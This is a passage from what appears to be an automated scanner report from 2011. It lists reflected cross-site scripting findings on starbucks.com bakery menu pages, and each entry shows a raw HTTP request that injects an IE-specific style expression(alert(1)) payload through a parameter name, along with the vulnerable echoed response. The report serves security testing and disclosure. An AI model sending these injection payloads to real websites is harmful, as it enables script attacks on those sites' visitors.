This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/blueberry-streusel-muffin?a4f8c"style%3d"x%3aexpression(alert(1))"3533e46b66c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:49:03 GMT
Connection: close
Content-Length: 43829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin?a4f8c"style="x:expression(alert(1))"3533e46b66c=1"/>
...[SNIP]...

1.824. http://www.starbucks.com/menu/food/bakery/butter-croissant [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/butter-croissant

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c60"style%3d"x%3aexpression(alert(1))"78f4d5b41a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61c60"style="x:expression(alert(1))"78f4d5b41a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/butter-croissant?61c60"style%3d"x%3aexpression(alert(1))"78f4d5b41a5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:07 GMT
Connection: close
Content-Length: 43459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/butter-croissant?61c60"style="x:expression(alert(1))"78f4d5b41a5=1"/>
...[SNIP]...

1.825. http://www.starbucks.com/menu/food/bakery/cheese-danish [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cheese-danish

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 720d9"style%3d"x%3aexpression(alert(1))"e96e6a310b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 720d9"style="x:expression(alert(1))"e96e6a310b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/cheese-danish?720d9"style%3d"x%3aexpression(alert(1))"e96e6a310b9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:28 GMT
Connection: close
Content-Length: 43530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cheese-danish?720d9"style="x:expression(alert(1))"e96e6a310b9=1"/>
...[SNIP]...

1.826. http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-chunk-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3ae7"style%3d"x%3aexpression(alert(1))"1218e3ddc34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3ae7"style="x:expression(alert(1))"1218e3ddc34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/chocolate-chunk-cookie?b3ae7"style%3d"x%3aexpression(alert(1))"1218e3ddc34=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:28 GMT
Connection: close
Content-Length: 43745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie?b3ae7"style="x:expression(alert(1))"1218e3ddc34=1"/>
...[SNIP]...

1.827. http://www.starbucks.com/menu/food/bakery/chocolate-croissant [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-croissant

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6af"style%3d"x%3aexpression(alert(1))"7f2ab7e4792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec6af"style="x:expression(alert(1))"7f2ab7e4792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/chocolate-croissant?ec6af"style%3d"x%3aexpression(alert(1))"7f2ab7e4792=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:24 GMT
Connection: close
Content-Length: 43723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chocolate-croissant?ec6af"style="x:expression(alert(1))"7f2ab7e4792=1"/>
...[SNIP]...

1.828. http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-old-fashion-doughnut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e17"style%3d"x%3aexpression(alert(1))"09e01d0c9ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8e17"style="x:expression(alert(1))"09e01d0c9ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/chocolate-old-fashion-doughnut?e8e17"style%3d"x%3aexpression(alert(1))"09e01d0c9ea=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:23 GMT
Connection: close
Content-Length: 44023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut?e8e17"style="x:expression(alert(1))"09e01d0c9ea=1"/>
...[SNIP]...

1.829. http://www.starbucks.com/menu/food/bakery/chonga-bagel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chonga-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a9de"style%3d"x%3aexpression(alert(1))"4d4ab94d51c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a9de"style="x:expression(alert(1))"4d4ab94d51c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/chonga-bagel?9a9de"style%3d"x%3aexpression(alert(1))"4d4ab94d51c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:59 GMT
Connection: close
Content-Length: 44374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chonga-bagel?9a9de"style="x:expression(alert(1))"4d4ab94d51c=1"/>
...[SNIP]...

1.830. http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cinnamon-chip-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9357"style%3d"x%3aexpression(alert(1))"a5e7a229ce8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9357"style="x:expression(alert(1))"a5e7a229ce8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/cinnamon-chip-scone?f9357"style%3d"x%3aexpression(alert(1))"a5e7a229ce8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:12 GMT
Connection: close
Content-Length: 44140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone?f9357"style="x:expression(alert(1))"a5e7a229ce8=1"/>
...[SNIP]...

1.831. http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cranberry-orange-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72286"style%3d"x%3aexpression(alert(1))"197c462648b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72286"style="x:expression(alert(1))"197c462648b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/cranberry-orange-scone?72286"style%3d"x%3aexpression(alert(1))"197c462648b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:41 GMT
Connection: close
Content-Length: 44023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone?72286"style="x:expression(alert(1))"197c462648b=1"/>
...[SNIP]...

1.832. http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-chocolate-brownie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f0b7"style%3d"x%3aexpression(alert(1))"aedb089978d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f0b7"style="x:expression(alert(1))"aedb089978d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/double-chocolate-brownie?6f0b7"style%3d"x%3aexpression(alert(1))"aedb089978d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:06 GMT
Connection: close
Content-Length: 43802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie?6f0b7"style="x:expression(alert(1))"aedb089978d=1"/>
...[SNIP]...

1.833. http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-fudge-mini-doughnut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1f7a"style%3d"x%3aexpression(alert(1))"12f20aa2559 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1f7a"style="x:expression(alert(1))"12f20aa2559 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/double-fudge-mini-doughnut?a1f7a"style%3d"x%3aexpression(alert(1))"12f20aa2559=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:17 GMT
Connection: close
Content-Length: 43677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut?a1f7a"style="x:expression(alert(1))"12f20aa2559=1"/>
...[SNIP]...

1.834. http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-iced-cinnamon-roll

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c5ac"style%3d"x%3aexpression(alert(1))"518bf21ccf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c5ac"style="x:expression(alert(1))"518bf21ccf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/double-iced-cinnamon-roll?5c5ac"style%3d"x%3aexpression(alert(1))"518bf21ccf8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:22 GMT
Connection: close
Content-Length: 44648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll?5c5ac"style="x:expression(alert(1))"518bf21ccf8=1"/>
...[SNIP]...

1.835. http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/ginger-molasses-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed67b"style%3d"x%3aexpression(alert(1))"139025d5ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed67b"style="x:expression(alert(1))"139025d5ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/ginger-molasses-cookie?ed67b"style%3d"x%3aexpression(alert(1))"139025d5ad=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:52:43 GMT
Connection: close
Content-Length: 43092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie?ed67b"style="x:expression(alert(1))"139025d5ad=1"/>
...[SNIP]...

1.836. http://www.starbucks.com/menu/food/bakery/hawaiian-bagel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/hawaiian-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c503f"style%3d"x%3aexpression(alert(1))"cd602ede713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c503f"style="x:expression(alert(1))"cd602ede713 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/hawaiian-bagel?c503f"style%3d"x%3aexpression(alert(1))"cd602ede713=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:13 GMT
Connection: close
Content-Length: 43576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/hawaiian-bagel?c503f"style="x:expression(alert(1))"cd602ede713=1"/>
...[SNIP]...

1.837. http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/iced-lemon-pound-cake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddfa4"style%3d"x%3aexpression(alert(1))"a47f474673c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ddfa4"style="x:expression(alert(1))"a47f474673c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/iced-lemon-pound-cake?ddfa4"style%3d"x%3aexpression(alert(1))"a47f474673c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
